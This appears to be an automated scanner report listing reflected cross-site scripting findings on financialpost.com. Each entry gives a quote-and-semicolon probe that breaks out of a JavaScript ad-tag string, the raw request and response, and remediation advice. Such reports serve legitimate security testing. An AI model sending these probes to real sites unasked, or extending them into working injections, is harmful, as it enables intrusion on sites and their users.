HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83722 Expires: Sun, 19 Dec 2010 03:10:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financea3bd2';4a915ea03ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financea3bd2';4a915ea03ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34415371?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55b32'%3b7da1471c85e was submitted in the REST URL parameter 3. This input was echoed as 55b32';7da1471c85e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Retired+forgotten/395308855b32'%3b7da1471c85e/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69813 Expires: Sun, 19 Dec 2010 03:11:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/retired-forgotten/395308855b32';7da1471c85e/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=retired-forgotten;kw=395308855b32';7da1471c85e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70920 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4833e'%3bb4e5a632b37 was submitted in the REST URL parameter 4. This input was echoed as 4833e';b4e5a632b37 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Retired+forgotten/3953088/4833e'%3bb4e5a632b37 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44021
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e57'%3bca94ef828cc was submitted in the REST URL parameter 1. This input was echoed as 13e57';ca94ef828cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance13e57'%3bca94ef828cc/Warning+Asset+bubbles+underway/3976343/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 82115 Expires: Sun, 19 Dec 2010 03:11:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance13e57';ca94ef828cc/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance13e57';ca94ef828cc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93912031?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 784df'%3bc9402d5d1b0 was submitted in the REST URL parameter 3. This input was echoed as 784df';c9402d5d1b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Warning+Asset+bubbles+underway/3976343784df'%3bc9402d5d1b0/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70296 Expires: Sun, 19 Dec 2010 03:11:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/warning-asset-bubbles-underway/3976343784df';c9402d5d1b0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=warning-asset-bubbles-underway;kw=3976343784df';c9402d5d1b0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundT ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 879f7'%3b7d1d07044c2 was submitted in the REST URL parameter 4. This input was echoed as 879f7';7d1d07044c2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Warning+Asset+bubbles+underway/3976343/879f7'%3b7d1d07044c2 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44395
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89866'%3bf41ed662908 was submitted in the REST URL parameter 1. This input was echoed as 89866';f41ed662908 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance89866'%3bf41ed662908/Where+retire+Florida+most+popular+state/3994547/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74641 Expires: Sun, 19 Dec 2010 03:11:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance89866';f41ed662908/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance89866';f41ed662908;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=43050737?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3844d'%3b1b9f456cfaa was submitted in the REST URL parameter 3. This input was echoed as 3844d';1b9f456cfaa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Where+retire+Florida+most+popular+state/39945473844d'%3b1b9f456cfaa/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70626 Expires: Sun, 19 Dec 2010 03:11:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/where-retire-florida-most-popular-state/39945473844d';1b9f456cfaa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=where-retire-florida-most-popular-state;kw=39945473844d';1b9f456cfaa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+ ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b00d'%3bf31fe2aaa22 was submitted in the REST URL parameter 4. This input was echoed as 4b00d';f31fe2aaa22 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Where+retire+Florida+most+popular+state/3994547/4b00d'%3bf31fe2aaa22 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38837
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d6ed'%3baddeb4e43f0 was submitted in the REST URL parameter 1. This input was echoed as 6d6ed';addeb4e43f0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance6d6ed'%3baddeb4e43f0/family/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37666
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 617d4'%3b9f9a6a368a8 was submitted in the REST URL parameter 2. This input was echoed as 617d4';9f9a6a368a8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/family617d4'%3b9f9a6a368a8/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43473
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4152d'%3b4ecd86d44f was submitted in the REST URL parameter 1. This input was echoed as 4152d';4ecd86d44f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance4152d'%3b4ecd86d44f/family/Landlord+held+hostage+real+estate+investments/3988718/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 78721 Expires: Sun, 19 Dec 2010 03:11:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance4152d';4ecd86d44f/family/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance4152d';4ecd86d44f;kw=family;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=27744648?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bc86'%3bfc78e586a48 was submitted in the REST URL parameter 2. This input was echoed as 7bc86';fc78e586a48 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/family7bc86'%3bfc78e586a48/Landlord+held+hostage+real+estate+investments/3988718/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 86485 Expires: Sun, 19 Dec 2010 03:11:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/family7bc86';fc78e586a48/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=family7bc86';fc78e586a48;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=64106571?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f536'%3bbcf3f98d4ac was submitted in the REST URL parameter 4. This input was echoed as 9f536';bcf3f98d4ac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/family/Landlord+held+hostage+real+estate+investments/39887189f536'%3bbcf3f98d4ac/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71534 Expires: Sun, 19 Dec 2010 03:11:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/family/landlord-held-hostage-real-estate-investments/39887189f536';bcf3f98d4ac/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=family;kw=landlord-held-hostage-real-estate-investments;kw=39887189f536';bcf3f98d4ac;kw=npo;kw=fpo;tile='+dartad_tile+ ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30c61'%3b08087bcffd1 was submitted in the REST URL parameter 5. This input was echoed as 30c61';08087bcffd1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/30c61'%3b08087bcffd1 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44855
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94b63'%3bbd61829af5f was submitted in the REST URL parameter 1. This input was echoed as 94b63';bd61829af5f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance94b63'%3bbd61829af5f/mortgages/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43570
